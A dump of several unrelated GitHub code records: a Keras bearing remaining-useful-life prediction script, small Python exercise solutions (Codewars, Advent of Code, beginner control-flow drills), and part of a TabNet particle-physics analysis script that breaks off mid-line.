life_time = load_data(learning=True, condition=1, bearing=1, filelength=2803)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train1_1, Y_train1_1 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B1: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=1, bearing=2, filelength=871)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train1_2, Y_train1_2 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B2: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time1_3 = load_data(learning=False, condition=1, bearing=3, filelength=2375)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time1_3 += test_RUL1_3\r\nX_test1_3, Y_test1_3 = split_x_y(life_time1_3, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B3: Test Dataset Loaded')\r\n\r\n#time, v_acc, life_time = load_data(learning=False, condition=1, bearing=4, filelength=1428)\r\n#time, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc, life_time) \r\n#X_test1_4, Y_test1_4 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\n#print('C1B4: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time1_5 = load_data(learning=False, condition=1, bearing=5, filelength=2463)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time1_5 += test_RUL1_5\r\nX_test1_5, Y_test1_5 = split_x_y(life_time1_5, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B5: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time1_6 = load_data(learning=False, condition=1, bearing=6, filelength=2448)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time1_6 += test_RUL1_6\r\nX_test1_6, Y_test1_6 = split_x_y(life_time1_6, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B6: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time1_7 = load_data(learning=False, condition=1, bearing=7, filelength=2259)\r\ntime, weibull_RMS, 
weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time1_7 += test_RUL1_7\r\nX_test1_7, Y_test1_7 = split_x_y(life_time1_7, time, weibull_RMS, weibull_Kurt)\r\nprint('C1B7: Test Dataset Loaded')\r\n\r\n\r\nprint('\\nCondition 2: \\n')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=2, bearing=1, filelength=911)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train2_1, Y_train2_1 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B1: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=2, bearing=2, filelength=797)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train2_2, Y_train2_2 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B2: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_3 = load_data(learning=False, condition=2, bearing=3, filelength=1955)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_3 += test_RUL2_3\r\nX_test2_3, Y_test2_3 = split_x_y(life_time2_3, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B3: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_4 = load_data(learning=False, condition=2, bearing=4, filelength=751)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_4 += test_RUL2_4\r\nX_test2_4, Y_test2_4 = split_x_y(life_time2_4, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B4: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_5 = load_data(learning=False, condition=2, bearing=5, filelength=2311)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_5 += test_RUL2_5\r\nX_test2_5, Y_test2_5 = split_x_y(life_time2_5, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B5: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_6 = load_data(learning=False, condition=2, bearing=6, filelength=701)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_6 += test_RUL2_6\r\nX_test2_6, Y_test2_6 = split_x_y(life_time2_6, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B6: Test Dataset Loaded')\r\n\r\ntime, v_acc, life_time2_7 = load_data(learning=False, condition=2, bearing=7, filelength=230)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time2_7 += test_RUL2_7\r\nX_test2_7, Y_test2_7 = split_x_y(life_time2_7, time, weibull_RMS, weibull_Kurt)\r\nprint('C2B7: Test Dataset Loaded')\r\n\r\n\r\nprint('\\nCondition 3: \\n')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=3, bearing=1, filelength=515)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train3_1, Y_train3_1 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C3B1: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time = load_data(learning=True, condition=3, bearing=2, filelength=1637)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nX_train3_2, Y_train3_2 = split_x_y(life_time, time, weibull_RMS, weibull_Kurt)\r\nprint('C3B2: Train Dataset Loaded')\r\n\r\ntime, v_acc, life_time3_3 = load_data(learning=False, condition=3, bearing=3, filelength=434)\r\ntime, weibull_RMS, weibull_Kurt = preprocess_dataset(time, v_acc) \r\nlife_time3_3 += test_RUL3_3\r\nX_test3_3, Y_test3_3 = split_x_y(life_time3_3, time, weibull_RMS, weibull_Kurt)\r\nprint('C3B3: Test Dataset Loaded')\r\n\r\n#-----------------------------------------Feature Scaling-----------------------------------------\r\n\r\nsc_1 = StandardScaler()\r\nX_train1_1 = 
sc_1.fit_transform(X_train1_1)\r\nX_train1_2 = sc_1.fit_transform(X_train1_2)\r\nX_test1_3 = sc_1.fit_transform(X_test1_3)\r\n#X_test1_4 = sc.transform(X_test1_4)\r\nX_test1_5 = sc_1.fit_transform(X_test1_5)\r\nX_test1_6 = sc_1.fit_transform(X_test1_6)\r\nX_test1_7 = sc_1.fit_transform(X_test1_7)\r\n\r\nsc_2 = StandardScaler()\r\nX_train2_1 = sc_2.fit_transform(X_train2_1)\r\nX_train2_2 = sc_2.fit_transform(X_train2_2)\r\nX_test2_3 = sc_2.fit_transform(X_test2_3)\r\nX_test2_4 = sc_2.fit_transform(X_test2_4)\r\nX_test2_5 = sc_2.fit_transform(X_test2_5)\r\nX_test2_6 = sc_2.fit_transform(X_test2_6)\r\nX_test2_7 = sc_2.fit_transform(X_test2_7)\r\n\r\nsc_3 = StandardScaler()\r\nX_train3_1 = sc_3.fit_transform(X_train3_1)\r\nX_train3_2 = sc_3.fit_transform(X_train3_2)\r\nX_test3_3 = sc_3.fit_transform(X_test3_3)\r\nprint('\\nApplied Feature Scaling\\n')\r\n\r\n#-----------------------------------Training Models-------------------------------------\r\n\r\nregressor_1 = Sequential()\r\nregressor_1.add(Dense(input_dim=6, output_dim=2, activation='sigmoid', init='uniform'))\r\nregressor_1.add(Dense(output_dim=1, activation='relu', init='uniform'))\r\nregressor_1.compile(optimizer='adam', loss='mean_absolute_percentage_error')\r\nregressor_1.fit(X_train1_1, Y_train1_1, batch_size=1000, epochs=40)\r\nprint('C1B1: Model Trained')\r\nregressor_1.fit(X_train1_2, Y_train1_2, batch_size=1000, epochs=40)\r\nprint('C1B2: Model Trained')\r\n\r\n#nn1 = NeuralNet(layers=[6, 2, 1], learning_rate=0.01, iterations=100)\r\n#nn1.fit(X_train1_1, Y_train1_1)\r\n#print('C1B1: Model Trained')\r\n#nn1.fit(X_train1_2, Y_train1_2)\r\n#print('C1B2: Model Trained')\r\n\r\n\r\nregressor_2 = Sequential()\r\nregressor_2.add(Dense(input_dim=6, output_dim=2, activation='sigmoid', init='uniform'))\r\nregressor_2.add(Dense(output_dim=1, activation='relu', init='uniform'))\r\nregressor_2.compile(optimizer='adam', loss='mean_absolute_percentage_error')\r\nregressor_2.fit(X_train2_1, Y_train2_1, batch_size=1000, epochs=40)\r\nprint('C2B1: Model Trained')\r\nregressor_2.fit(X_train2_2, Y_train2_2, batch_size=1000, epochs=40)\r\nprint('C2B2: Model Trained')\r\n\r\n\r\nregressor_3 = Sequential()\r\nregressor_3.add(Dense(input_dim=6, output_dim=2, activation='sigmoid', init='uniform'))\r\nregressor_3.add(Dense(output_dim=1, activation='relu', init='uniform'))\r\nregressor_3.compile(optimizer='adam', loss='mean_absolute_percentage_error')\r\nregressor_3.fit(X_train3_1, Y_train3_1, batch_size=1000, epochs=40)\r\nprint('C3B1: Model Trained')\r\nregressor_3.fit(X_train3_2, Y_train3_2, batch_size=1000, epochs=40)\r\nprint('C3B2: Model Trained')\r\n\r\n#-----------------------------------------Results---------------------------------------------\r\n\r\nprint('\\nCondition 1:')\r\n\r\nY_pred1_3 = regressor_1.predict(X_test1_3)\r\nmean_percent_error = np.mean((abs(Y_pred1_3.flatten() - Y_test1_3) / Y_test1_3) * 100)\r\npredicted_RUL = (1-Y_pred1_3[-1])[0]*life_time1_3\r\nprint('\\nB13 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B13 Actual RUL: ',test_RUL1_3,'s')\r\nprint('Test B13 Mean Error: ',mean_percent_error,'%')\r\n\r\n#Y_pred1_4 = regressor.predict(X_test1_4)\r\n#mean_percent_error = np.mean((abs(Y_pred1_4.flatten() - Y_test1_4) / Y_test1_4) * 100)\r\n#print('Test B14 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred1_5 = regressor_1.predict(X_test1_5)\r\nmean_percent_error = np.mean((abs(Y_pred1_5.flatten() - Y_test1_5) / Y_test1_5) * 100)\r\npredicted_RUL = (1-Y_pred1_5[-1])[0]*life_time1_5\r\nprint('\\nB15 Predicted RUL: 
',predicted_RUL,'s')\r\nprint('B15 Actual RUL: ',test_RUL1_5,'s')\r\nprint('Test B15 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred1_6 = regressor_1.predict(X_test1_6)\r\nmean_percent_error = np.mean((abs(Y_pred1_6.flatten() - Y_test1_6) / Y_test1_6) * 100)\r\npredicted_RUL = (1-Y_pred1_6[-1])[0]*life_time1_6\r\nprint('\\nB16 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B16 Actual RUL: ',test_RUL1_6,'s')\r\nprint('Test B16 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred1_7 = regressor_1.predict(X_test1_7)\r\nmean_percent_error = np.mean((abs(Y_pred1_7.flatten() - Y_test1_7) / Y_test1_7) * 100)\r\npredicted_RUL = (1-Y_pred1_7[-1])[0]*life_time1_7\r\nprint('\\nB17 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B17 Actual RUL: ',test_RUL1_7,'s')\r\nprint('Test B17 Mean Error: ',mean_percent_error,'%')\r\n\r\nprint('\\nCondition 2:')\r\n\r\nY_pred2_3 = regressor_2.predict(X_test2_3)\r\nmean_percent_error = np.mean((abs(Y_pred2_3.flatten() - Y_test2_3) / Y_test2_3) * 100)\r\npredicted_RUL = (1-Y_pred2_3[-1])[0]*life_time2_3\r\nprint('\\nB23 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B23 Actual RUL: ',test_RUL2_3,'s')\r\nprint('Test B23 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred2_4 = regressor_2.predict(X_test2_4)\r\nmean_percent_error = np.mean((abs(Y_pred2_4.flatten() - Y_test2_4) / Y_test2_4) * 100)\r\npredicted_RUL = (1-Y_pred2_4[-1])[0]*life_time2_4\r\nprint('\\nB24 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B24 Actual RUL: ',test_RUL2_4,'s')\r\nprint('Test B24 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred2_5 = regressor_2.predict(X_test2_5)\r\nmean_percent_error = np.mean((abs(Y_pred2_5.flatten() - Y_test2_5) / Y_test2_5) * 100)\r\npredicted_RUL = (1-Y_pred2_5[-1])[0]*life_time2_5\r\nprint('\\nB25 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B25 Actual RUL: ',test_RUL2_5,'s')\r\nprint('Test B25 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred2_6 = regressor_2.predict(X_test2_6)\r\nmean_percent_error = np.mean((abs(Y_pred2_6.flatten() - Y_test2_6) / Y_test2_6) * 100)\r\npredicted_RUL = (1-Y_pred2_6[-1])[0]*life_time2_6\r\nprint('\\nB26 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B26 Actual RUL: ',test_RUL2_6,'s')\r\nprint('Test B26 Mean Error: ',mean_percent_error,'%')\r\n\r\nY_pred2_7 = regressor_2.predict(X_test2_7)\r\nmean_percent_error = np.mean((abs(Y_pred2_7.flatten() - Y_test2_7) / Y_test2_7) * 100)\r\npredicted_RUL = (1-Y_pred2_7[-1])[0]*life_time2_7\r\nprint('\\nB27 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B27 Actual RUL: ',test_RUL2_7,'s')\r\nprint('Test B27 Mean Error: ',mean_percent_error,'%')\r\n\r\nprint('\\nCondition 3:')\r\n\r\nY_pred3_3 = regressor_3.predict(X_test3_3)\r\nmean_percent_error = np.mean((abs(Y_pred3_3.flatten() - Y_test3_3) / Y_test3_3) * 100)\r\npredicted_RUL = (1-Y_pred3_3[-1])[0]*life_time3_3\r\nprint('\\nB33 Predicted RUL: ',predicted_RUL,'s')\r\nprint('B33 Actual RUL: ',test_RUL3_3,'s')\r\nprint('Test B33 Mean Error: ',mean_percent_error,'%\\n')\r\n\r\n#--------------------------------------Plots-------------------------------------------\r\n\r\ntime = [i for i in range(Y_test1_3.shape[0])]\r\nplt.plot(time,Y_test1_3)\r\nplt.plot(time,Y_pred1_3)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing1_3')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test1_5.shape[0])]\r\nplt.plot(time,Y_test1_5)\r\nplt.plot(time,Y_pred1_5)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For 
Bearing1_5')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test1_6.shape[0])]\r\nplt.plot(time,Y_test1_6)\r\nplt.plot(time,Y_pred1_6)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing1_6')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test1_7.shape[0])]\r\nplt.plot(time,Y_test1_7)\r\nplt.plot(time,Y_pred1_7)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing1_7')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_3.shape[0])]\r\nplt.plot(time,Y_test2_3)\r\nplt.plot(time,Y_pred2_3)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_3')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_4.shape[0])]\r\nplt.plot(time,Y_test2_4)\r\nplt.plot(time,Y_pred2_4)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_4')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_5.shape[0])]\r\nplt.plot(time,Y_test2_5)\r\nplt.plot(time,Y_pred2_5)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_5')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_6.shape[0])]\r\nplt.plot(time,Y_test2_6)\r\nplt.plot(time,Y_pred2_6)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_6')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test2_7.shape[0])]\r\nplt.plot(time,Y_test2_7)\r\nplt.plot(time,Y_pred2_7)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing2_7')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\ntime = [i for i in range(Y_test3_3.shape[0])]\r\nplt.plot(time,Y_test3_3)\r\nplt.plot(time,Y_pred3_3)\r\nplt.xlabel('Time in sec')\r\nplt.ylabel('Completed Life percentage')\r\nplt.title('For Bearing3_3')\r\nplt.legend(['Actual','Predicted'])\r\nplt.show()\r\n\r\n","repo_name":"Aka-sky/RUL-Prediction","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":25147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35165676652","text":"'''\nMake a program that filters a list of strings and returns a list with only your friends name in it.\n\nIf a name has exactly 4 letters in it, you can be sure that it has to be a friend of yours! 
Otherwise, you can be sure he's not...\n\nEx: Input = [\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"], Output = [\"Ryan\", \"Yous\"]\n\ni.e.\n\nfriend [\"Ryan\", \"Kieran\", \"Mark\"] `shouldBe` [\"Ryan\", \"Mark\"]\nNote: keep the original order of the names in the output.\nTest.assert_equals(friend([\"Ryan\", \"Kieran\", \"Mark\",]), [\"Ryan\", \"Mark\"])\n'''\n\ntestval = [\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]\n\ndef friend(in_list):\n out_list = []\n for x in in_list:\n if len(x) == 4:\n out_list.append(x)\n return out_list\n\ndef beter_friend(in_list):\n #after reading the best solution, use list comprehension\n #short https://medium.com/better-programming/list-comprehension-in-python-8895a785550b\n #longer https://realpython.com/list-comprehension-python/\n \n return[x for x in in_list if len(x) == 4]\n\n\nprint(friend(testval))\nprint(friend([\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]))\nprint(friend([\"1234\", \"12345\", \"2345\", \"4567\"]))\n\nprint(beter_friend(testval))\nprint(beter_friend([\"Ryan\", \"Kieran\", \"Jason\", \"Yous\"]))\nprint(beter_friend([\"1234\", \"12345\", \"2345\", \"4567\"]))\n","repo_name":"willhollingsworth/Study","sub_path":"Codewars/Python/7 kyu/Friend or Foe.py","file_name":"Friend or Foe.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11775943817","text":"import util.DataLoader\n\n\ndef load_data(path_data):\n data = util.DataLoader.DataFile(path_data)\n data.load_basic_list()\n\n results = {}\n idx = 0\n\n for value in data.list:\n results[idx] = value.split('|')\n\n results[idx][0] = results[idx][0].strip().split(\" \")\n results[idx][1] = results[idx][1].strip().split(\" \")\n idx += 1\n\n return results\n\n\ndef process_digits(digit):\n if len(digit) == 2:\n return 1\n if len(digit) == 3:\n return 7\n if len(digit) == 4:\n return 4\n if len(digit) == 7:\n return 8\n\n return None\n\n\ndef process_row(values):\n print (values)\n count_digi = 0\n for value in values:\n\n if process_digits(value) in (1, 4, 7, 8):\n count_digi += 1\n\n return count_digi\n\n\ndef main():\n path_data = \"./2021/Day8/day8.data\"\n data_to_process = load_data(path_data)\n\n count_digi = 0\n for row in data_to_process:\n count_digi = count_digi + process_row (data_to_process[row][1])\n\n print (count_digi)\n\n\nmain()","repo_name":"francastellano/adventofcode","sub_path":"2021/Day8/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37047603343","text":"### 3.1 Conditional operator / Logical operator - Rollercoaster exercise\r\n\r\nprint(\"Welcome to the rollercoaster!\")\r\nheight = int(input(\"What is your height in cm? \"))\r\nbill = 0\r\n\r\nif height >= 120: # Comparisson operators\r\n print(\"You can ride the rollercoaster!\")\r\n age = int(input(\"What is your age?\"))\r\n if age < 12:\r\n bill = 5\r\n print(\"Child tickets are $5.\")\r\n elif age <= 18:\r\n bill = 7\r\n print(\"Youth tickets are $7.\")\r\n else:\r\n bill = 12\r\n print(\"Adult tickets are 12.\")\r\n wants_photo = input(\"Do you want a photo taken? 
Y or N.\")\r\n \r\n if wants_photo == \"Y\":\r\n bill += 3\r\n # add 3$ to their bill\r\n print(f\"Your final bill is ${bill}\")\r\nelse:\r\n print(\"Sorry, you have to grow taller before you can ride.\")\r\n\r\n### 3.2 Odd or even exercise\r\n\r\nnumber = int(input(\"Which number do you want to choose?\"))\r\nif number % 2 ==0:\r\n print(\"This is an even number.\")\r\nelse:\r\n print(\"This is an odd number.\")\r\n\r\n### 3.3 BMI Calculator 2.0 Exercise\r\n\r\nheight = input(\"enter your height in m: \")\r\nweight = input(\"enter your weight in kg: \")\r\nbmi = float(weight) / float(height) ** 2\r\n\r\nif bmi <18.5:\r\n print(f\"Your BMI is {round(bmi)}, you are underweight.\")\r\nelif bmi <25:\r\n print(f\"Your BMI is {round(bmi)}, you have a normal weight.\")\r\nelif bmi <30:\r\n print(f\"Your BMI is {round(bmi)}, you are slightly overweight.\")\r\nelif bmi <35:\r\n print(f\"Your BMI is {round(bmi)}, you are slightly obese.\")\r\nelse:\r\n print(f\"Your BMI is {round(bmi)}, you are clinically obese.\")\r\n\r\n### 3.4 Leap year exercise\r\n\r\nyear = int(input(\"Which year do you want to check?\"))\r\n\r\nif year % 4 == 0:\r\n if year % 100 == 0:\r\n if year % 400 == 0:\r\n print(\"Leap year.\")\r\n else:\r\n print(\"Not leap year.\")\r\n print(\"Leap year\")\r\nelse:\r\n print(\"Not leap year.\")\r\n\r\n### 3.5 - Pizza order - Exercise\r\n\r\nprint(\"Welcome to Python Pizza Deliveries!\")\r\nsize = input(\"What size pizza do you want? S, M, L\")\r\nadd_pepperoni = input(\"Do you want pepperoni? Y, N\")\r\nextra_cheese = input(\"Do you want extra cheese? Y, N\")\r\n\r\nbill = 0\r\n\r\nif size == \"S\":\r\n bill = 15\r\n if add_pepperoni == \"Y\":\r\n bill += 2\r\n if extra_cheese == \"Y\":\r\n bill += 1\r\nelif size == \"M\":\r\n bill = 20\r\n if add_pepperoni == \"Y\":\r\n bill += 3\r\n if extra_cheese == \"Y\":\r\n bill += 1\r\nelse:\r\n bill = 25\r\n if add_pepperoni == \"Y\":\r\n bill += 3\r\n if extra_cheese == \"Y\":\r\n bill += 1\r\n\r\nprint(f\"Your final bill is: ${bill}.\")\r\n\r\n### 3.6 - Love Calculator - Exercise\r\n\r\nprint(\"Welcome to the Love Calculator!\")\r\nname1 = input(\"What is your name? \\n\")\r\nname2 = input(\"What is their name? \\n\")\r\n\r\ncombined_string = name1 + name2\r\nlower_case_string = combined_string.lower()\r\n\r\nt = lower_case_string.count(\"t\")\r\nr = lower_case_string.count(\"r\")\r\nu = lower_case_string.count(\"u\")\r\ne = lower_case_string.count(\"e\")\r\n\r\ntrue = t + r + u + e\r\n\r\nl = lower_case_string.count(\"l\")\r\no = lower_case_string.count(\"o\")\r\nv = lower_case_string.count(\"v\")\r\ne = lower_case_string.count(\"e\")\r\n\r\nlove = l + o + v + e\r\nlove_score = int(str(true) + str(love))\r\n\r\nif (love_score < 10) or (love_score > 90):\r\n print(f\"Your score is {love_score}, you go together like coke and mentos.\")\r\nelif (love_score >= 40) and (love_score <= 50):\r\n print(f\"Your score is {love_score}, you are alright together.\")\r\nelse:\r\n print(f\"Your score is {love_score}\")\r\n\r\n# Day 3 Project - Treasure island game\r\n\r\nprint(\"Welcome to Treasure Island.\")\r\nprint(\"Your mission is to find the treasure.\")\r\nleft_or_right = input(\"You are at a cross road. Where do you want to go? Type 'left' or 'right' \\n\")\r\nleft_or_right = left_or_right.lower()\r\n\r\nif left_or_right != \"left\":\r\n print(\"You fell into a hole. Game over.\")\r\nelse:\r\n swim_or_wait = input(\"You have come to a lake. There is an island in the middle of it. \"\r\n \"Would you rather swim or wait for a boat? 
swim / wait \\n\")\r\n swim_or_wait = swim_or_wait.lower()\r\n if swim_or_wait != \"wait\":\r\n print(\"You have been attacked by trout. Game over.\")\r\n else:\r\n door = input(\"Which door do you choose? red / blue / yellow \\n\")\r\n door = door.lower()\r\n if door == \"red\":\r\n print(\"You have been burned by fire. Game over.\")\r\n elif door == \"yellow\":\r\n print(\"You win!\")\r\n elif door == \"blue\":\r\n print(\"You have been eaten by beasts. Game over.\")\r\n else:\r\n print(\"Game over.\")\r\n","repo_name":"KristianAleksiev/100-Days-of-Code-The-Complete-Python-Bootcamp","sub_path":"Day_03/day_3_control_flow_and_logical_operators.py","file_name":"day_3_control_flow_and_logical_operators.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1227547120","text":"import ROOT\nfrom pytorch_tabnet.tab_model import TabNetClassifier\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport sys,os\nsys.path.append(os.environ[\"DIR_PATH\"])\nROOT.EnableImplicitMT(4)\nfrom root_data_loader import load_data\nmodel = TabNetClassifier()\nfolder_path = '/data6/Users/yeonjoon/VcbMVAStudy/TabNet_template/model'\nfiles = os.listdir(folder_path)\n# Filter for files with a .pt.zip extension\npt_zip_files = [f for f in files if f.endswith('.zip')]\n\nmodel.load_model(os.path.join(folder_path,pt_zip_files[0]))\nmodelist = ['45','43','41','23','21']\nvarlist = ['bvsc_w_d','cvsl_w_u','cvsb_w_u','cvsb_w_d','n_bjets','pt_had_t_b','pt_w_d','bvsc_had_t_b','weight']\nvarlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','pt_w_u','pt_w_d','weight']\nvarlist.extend(['n_jets',\n 'pt_had_t_b','pt_w_u','pt_w_d','pt_lep_t_b',\n 'eta_had_t_b','eta_w_u','eta_w_d','eta_lep_t_b',\n 'bvsc_lep_t_b','bvsc_had_t_b',\n 'm_w_u','m_w_d'])\n\n\n#varlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight']\n#varlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight']\n#varlist = ['cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight']\n#varlist.extend(['n_jets',\n # 'pt_had_t_b','pt_w_u','pt_w_d','pt_lep_t_b',\n # 'eta_had_t_b','eta_w_u','eta_w_d','eta_lep_t_b',\n # 'bvsc_lep_t_b','bvsc_had_t_b'])\n######fullinput\nvarlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d','cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight']\nvarlist.extend(['n_jets',\n 'pt_had_t_b','pt_w_u','pt_w_d','pt_lep_t_b',\n 'eta_had_t_b','eta_w_u','eta_w_d','eta_lep_t_b',\n 'bvsc_lep_t_b','bvsc_had_t_b'])\n\n\n \n#KPS modification\nvarlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d',\n 'cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight'\n ,'pt_w_u','pt_w_d','eta_w_u','eta_w_d','best_mva_score']\n# #\n# varlist = ['bvsc_w_u','bvsc_w_d','cvsl_w_u','cvsl_w_d',\n# 'cvsb_w_u','cvsb_w_d','n_bjets','n_cjets','weight'\n# ,'m_had_t','m_had_w','best_mva_score'] \nresult = []\n# outfile = ROOT.TFile(os.path.join(folder_path,'predictions.root'), \"RECREATE\")\n# for mode in modelist:\n# for reco_status in ['Correct','Fail_00','Fail_10','Fail_01','Fail_11']:\n# filter_str = f'decay_mode=={mode}'\n \n# file = '/gv0/Users/yeonjoon/Vcb/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root' if mode =='45' else '/gv0/Users/yeonjoon/Vcb/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_powheg.root'\n# input_tuple=( #first element of tuple = signal tree, second =bkg tree.\n# 
[('/gv0/Users/yeonjoon/Vcb/Sample/2018/Mu/RunResult/Central_Syst/Vcb_TTLJ_WtoCB_powheg.root','POGTightWithTightIso_Central/Result_Tree',f'chk_reco_=={reco_status}&&decay_mode=={mode}')] ##TTLJ_WtoCB Reco 1, (file_path, tree_path, filterstr)\n# ,[] ##TTLJ_WtoCB cs decay\n# )\n# data = load_data(tree_path_filter_str=input_tuple,varlist=varlist,test_ratio=0.1,val_ratio=0.2)\n# arr = data['train_features']\n# weights = data['train_weight']\n# pred = model.predict_proba(arr)[:,1]\n# hist = ROOT.TH1F(f\"pred_{mode}_{reco_status}\", f\"Predictions for Reco_{mode}_{reco_status}\", 40, 0., 1.)\n# for i in range(len(pred)):\n# hist.Fill(pred[i], weights[i])\n# hist.Write() \n# del data\n# del arr\n# del weights\n# del pred\n# outfile.Close()\n# df = pd.concat([pd.DataFrame(a, columns=[modelist[i]]) for i, a in enumerate(result)], axis=1)\n# fig = df.plot.hist(stacked=True, 